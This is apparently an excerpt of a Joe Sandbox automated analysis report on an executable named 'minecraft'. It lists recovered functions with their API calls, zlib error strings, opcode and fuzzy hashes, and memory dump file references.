    • API String ID: 3171405041-0
    • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
    • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
    • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
    • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: memset$memcpy
    • String ID:
    • API String ID: 368790112-0
    • Opcode ID: d3cebf725d949ebbd98cb9ef7f68bda467ea1853d0e4d33e0ea42ea6cb49cd70
    • Instruction ID: a94d66f0502d68e3f48ed78985175dce6facf9e9c189752d3e598d0e8768336a
    • Opcode Fuzzy Hash: d3cebf725d949ebbd98cb9ef7f68bda467ea1853d0e4d33e0ea42ea6cb49cd70
    • Instruction Fuzzy Hash: 2231F1B271064081FB16DA2BF4507ED6752E7DDBD0F848126EB1A87BAACE3EC542C740
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID:
    • String ID: $ $header crc mismatch
    • API String ID: 0-4092041874
    • Opcode ID: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
    • Instruction ID: 7b7c0dcb7b367ac831aed03830ec8ef67ea91f0dce79e30e5349fd19ccede3bc
    • Opcode Fuzzy Hash: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
    • Instruction Fuzzy Hash: F6B1A4726002D48BE7A79B16C488BAE3BEAFB4CB94F164518FB854B3E1D775C940C740
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Heapwcsncpy$AllocateFree
    • String ID:
    • API String ID: 2817115924-0
    • Opcode ID: 148ba3b1c52b5aa1fd378a7d38282354f494ce16b4f038740f7610afa5151547
    • Instruction ID: b6b9e846c04cb6e9a04139aff3d7e83eda40acee9614ff25bed0c888bce5a2ba
    • Opcode Fuzzy Hash: 148ba3b1c52b5aa1fd378a7d38282354f494ce16b4f038740f7610afa5151547
    • Instruction Fuzzy Hash: 3651B2B2B0068485EA66DF26A404BEA77E1F789BD4F588125EF5D477E5EB3CC542C300
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: AllocateCriticalHeapSection$EnterLeave
    • String ID:
    • API String ID: 3625150316-0
    • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
    • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
    • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
    • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: memcpy
    • String ID: $ $invalid stored block lengths
    • API String ID: 3510742995-1718185709
    • Opcode ID: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
    • Instruction ID: c92309fc0d38d6234d0408f55a04ce57e81ba093b92e9b8f78a366b710634dd8
    • Opcode Fuzzy Hash: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
    • Instruction Fuzzy Hash: F041AC726107A09BE7668F26C4847AD3BA9F70C7C4F215129FF4A4BBA4D735D890CB40
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: EntryFunctionLookup$UnwindVirtual
    • String ID:
    • API String ID: 3286588846-0
    • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
    • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
    • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
    • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: AllocateHeapmemsetwcscpywcslen
    • String ID:
    • API String ID: 2037025450-0
    • Opcode ID: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
    • Instruction ID: 6743f53f77a36836f55a7605488c5dfe466d4e7a0e85049e430ca513693cbf19
    • Opcode Fuzzy Hash: b978c47abf32f50db09605b5f54ccf2d2c55a7be9a486567f80230ab28ac97f2
    • Instruction Fuzzy Hash: 6D3109B5605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518350
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: Heap$Free$Allocate
    • String ID:
    • API String ID: 3472947110-0
    • Opcode ID: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
    • Instruction ID: 5bc8d6a19ab5820ea12ddcb4c1614eb0e390fbda2a9c6e8bfd6285e08278190a
    • Opcode Fuzzy Hash: d245e5653b3efa210e15e45dc3095293edc3cbf2e23a43fbe2619f5dacf3537d
    • Instruction Fuzzy Hash: B73142B2211B409BE702DF13EA807A977A4F788BC0F448429EB4847B65DF79E4A6C740
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: CharLower
    • String ID:
    • API String ID: 1615517891-0
    • Opcode ID: aabfa1885bbcdd7278eb26932432713e72225ea50af0810a3f1a86d8e5eb4003
    • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
    • Opcode Fuzzy Hash: aabfa1885bbcdd7278eb26932432713e72225ea50af0810a3f1a86d8e5eb4003
    • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: ByteCharMultiWidemalloc
    • String ID:
    • API String ID: 2735977093-0
    • Opcode ID: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
    • Instruction ID: eb7332db7f165f027367f4732026c4c5e1ffc84dd66e6814e4cbb0aaa670ffe8
    • Opcode Fuzzy Hash: c3b8fcaeda161a58b67eb2a29d4de436d169905ef7e21983a714ce1bab924364
    • Instruction Fuzzy Hash: 2C216532208B8086D725CF16B44079AB7A5F7887E4F488725FF9917BA5DF79C551C700
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: AllocateCriticalHeapSection$EnterLeave
    • String ID:
    • API String ID: 3625150316-0
    • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
    • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
    • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
    • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: FolderFreeFromListLocationPathTaskwcslen
    • String ID:
    • API String ID: 4012708801-0
    • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
    • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
    • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
    • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: CriticalFreeHeapSection$EnterLeave
    • String ID:
    • API String ID: 1298188129-0
    • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
    • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
    • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
    • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: ByteCharMultiWidemalloc
    • String ID:
    • API String ID: 2735977093-0
    • Opcode ID: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
    • Instruction ID: 40dc39d6401ac23dbbf15f28fc1e93d87451d781889f5abbfcb2521dceb51717
    • Opcode Fuzzy Hash: b82687d318f43acb72b95e327159745dac6b4a7bc8d4a8e935ee1388842a16e4
    • Instruction Fuzzy Hash: 3A118F3260878086EB25CF66B41076ABBA5FB8CBE4F544328EF9D57BA5DF39C4118704
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1705333902.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
    • Associated: 00000000.00000002.1705311196.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705364426.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1705388555.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_140000000_minecraft.jbxd
    Similarity
    • API ID: FreeHeap$CriticalSection$EnterLeavememset
    • String ID:
    • API String ID: 4254243056-0
    • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
    • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
    • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
    • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740